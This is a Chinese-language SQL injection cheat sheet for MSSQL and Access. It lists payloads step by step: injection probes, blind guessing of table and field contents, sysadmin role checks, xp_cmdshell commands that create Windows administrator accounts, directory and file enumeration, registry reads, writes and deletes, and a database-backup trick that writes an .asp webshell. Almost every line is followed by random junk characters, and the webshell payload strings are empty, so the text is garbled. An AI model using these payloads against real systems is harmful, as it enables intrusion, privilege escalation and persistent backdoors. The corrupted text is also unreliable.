1.判断是否有注入;and 1=1 ;and 1=2 d]K��$0HY
2.初步判断是否是mssql ;and user>0 T�h!�;zu^t
9/JB���n��
3.注入参数是字符'and [查询条件] and ''=' �Wi@���Y�J
Vr:`?V9Q2(
4.搜索时没过滤参数的'and [查询条件] and '%25'=' I+/fX0-Lib
J�qV}>"WMV
5.判断数据库系统 fb8)jd'~}O
O�m(I��r&0
;and (select count(*) from sysobjects)>0 mssql J,�*+Ak
�~
hr���W2�#v
;and (select count(*) from msysobjects)>0 access q.bx��nta"
�l�\W�N�
3}��lIY7�O
�y&��(pt!I
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E1�s�~ �+�
)%09j0y>l"
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $�D�W_��_h
#A&49�a3^1
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �5><�T#0W?
��<�DN���7
9.(1)猜字段的ascii值(access) _��9y!�,ST
8�GeJ%^0o}
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 gu��"@*,hL
�3qkP�e_<I
(2)猜字段的ascii值(mssql) �Z~]�G+�(�
?4��#UW7I�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 sr��h�I%Zj
dVSQG947i:
10.测试权限结构(mssql) �P9)L1l<3I
�e5d STc`�
phR�:=Ox|1
,uPN\`�.u8
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >P ~j�@L�v
q[(1zG%NbA
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- XXA�.wPD�-
0ev=�'v8�?
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- av� �b�up�
u6�Yp��,!+
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ft��1V1 c�
Q�<Qd*v�&-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _p'u!.a?�!
=E62N7_`=�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- j��Ln|�z�K
DWS#q|j`"�
;and 1=(select IS_MEMBER('db_owner'));-- �YjiMUi\�V
2U�3�e�!V�
�C]�&�/k_k
3Ww 37V>h�
11.添加mssql和系统的帐户 -<�:w{�c�V
iB5q�"hoZC
;exec master.dbo.sp_addlogin username;-- 6�m�qp`x`�
;exec master.dbo.sp_password null,username,password;-- ��K >Q���6
O�Aa�LCpRp
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �qE�RJEyU?
y�L� %88,/
;exec master.dbo.xp_cmdshell 'net user username password �Wm4�C(y@
??�f,(�om�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ZiP�z~G0[^
6xFchdMG{m
;exec master.dbo.xp_cmdshell 'net user username password /add';--
[�?�bq4u`
�PZVH=dagq
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- p6&<eMw�FA
�CwD�=nT5`
�V���jd(�Z
��s4j�]kH�
12.(1)遍历目录 ?6UjD5NkX
9&{z?�*���
;create table dirs(paths varchar(100), id int) Vh��a,r�Ii
sL,|+>7T^M
;insert dirs exec master.dbo.xp_dirtree 'c:\' �-EP�(/CS!
�R�L[F 9g�
;and (select top 1 paths from dirs)>0 x�o4l��M��
xd\�ml
37~
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) L)qUBp@MW�
�6z�]�y
=J
_�sn<"�B%>
1�'P4{T0 [
(2)遍历目录 ��bokr,I�3
0o��ZZL��i
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z4(`>z2a��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 6�s>io%,�:
{0������%�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 +F.@n_}p-I
S�LNq%7apx
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��YP[8d,��
^\[c]�[f�o
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 N,UU�M|?9_
m6'9I�d-:L
�gjx-tp 1.
��OO�</�d:
13.mssql中的存储过程 x�UNq!�({T
uz�T��+,�
xp_regenumvalues 注册表根键, 子键 L9oLd�Wa(C
%`~+^{��Wp
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 x�4h.WD�T$
G9�Noch9
g
xp_regread 根键,子键,键值名 �fhyoSRLR:
vz)�R8�4��
;exec xp_regread �{�Us^�4Xe
�B@S~v�+Gr
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �>I-r�sw2�
&�3J�^z7kU
xp_regwrite 根键,子键, 值名, 值类型, 值 ��K4]�#�X"
�x!7�r7|iV
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 i6$HwRZm�#
L�2��_[�M'
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��Q}cti��/
olr-o�i`4C
xp_regdeletevalue 根键,子键,值名 ���Mp=T;Nz
|!�/+��T^u
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ^��cE��{Uv
E�;9J7�Q
4
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 C��/QrkTi=
JLz32 �%-M
a�:�O�M��I
/r�2�S1"(q
14.mssql的backup创建webshell � Z�pM�v16
YQtq�?&0Ct
use model ]')y��(_{�
%��YbL%i|U
create table cmd(str image); mnBT�Z/ZjS
}%AfZ�2g;h
insert into cmd(str) values (''); Qv
g_|~n�
�|I�Cn/r~�
backup database model to disk='c:\l.asp'; sS��c~q+xz
`��%^�w-'�
)Gk?x$�pY@
vexF|'!}0#
15.mssql内置函数 q�[+�h ~)�
�G�
��B,�O
;and (select @@version)>0 获得Windows的版本号 ti$6�0�U�p
�;nJ��2i?"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .C�&kWM�&j
<lNN�T6[/r
;and (select user_name())>0 爆当前系统的连接用户 hS*&p0YV~M
]Yf^O @<<>
;and (select db_name())>0 得到当前连接的数据库 ��E�0l&�d
x^� `IZ{�!
X
�@pm�!c#
�ExN�$���J
16.简洁的webshell `.d�w�G�3R
Ujlb�cv6�+
use model 6��!�?]
�(
Ekik_!��aB
create table cmd(str image); F�F�cI�On�
w�t;�`�_}g
insert into cmd(str) values (''); Kv9F�qrDj�
IOF!Ra:�w�
backup database model to disk='g:\wwwtest\l.asp';
